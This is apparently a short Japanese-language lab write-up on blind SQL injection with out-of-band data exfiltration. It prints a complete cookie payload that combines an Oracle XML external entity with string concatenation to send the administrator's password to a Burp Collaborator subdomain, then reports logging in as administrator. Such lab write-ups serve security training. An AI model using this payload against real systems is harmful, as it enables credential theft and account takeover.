Blind SQL injection with out-of-band data exfiltration
はじめに
「Blind SQL injection with out-of-band data exfiltration」のWriteupです。
Summary
||
による文字列連結などを使って、データベースから送信されるトラフィックに機密情報を載せる手法です。
前回同様ですが、CookieもURLエンコードが必要とのことで、CyberChefを使ったもののうまくいきませんでした。必要最低限のエンコードに留めなければならないんでしょうか?要確認です。
Writeup
今回の目的は、サイトにadministratorとしてログインすることです。
前回と同様の手法でデータベースとCollaboratorの疎通確認をした後、administratorのパスワードを取得するSELECT文を含んだSQLクエリ、を含んだリクエストを送信します。
TrackingId=p2GScen314boOmL7'+UNION+SELECT+extractvalue(xmltype('<%3Fxml+version%3D"1.0"+encoding%3D"UTF-8"%3F><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3A//'||(SELECT+password+FROM+users+WHERE+username+%3d+'administrator')||'.WHAT-YOU-ARE-ISSUED.burpcollaborator.net/">+%25remote%3B]'),'/l')+FROM+dual--+;
すると、Collaboratorのサブドメインにパスワードらしき文字列が含まれています。
ログインできました。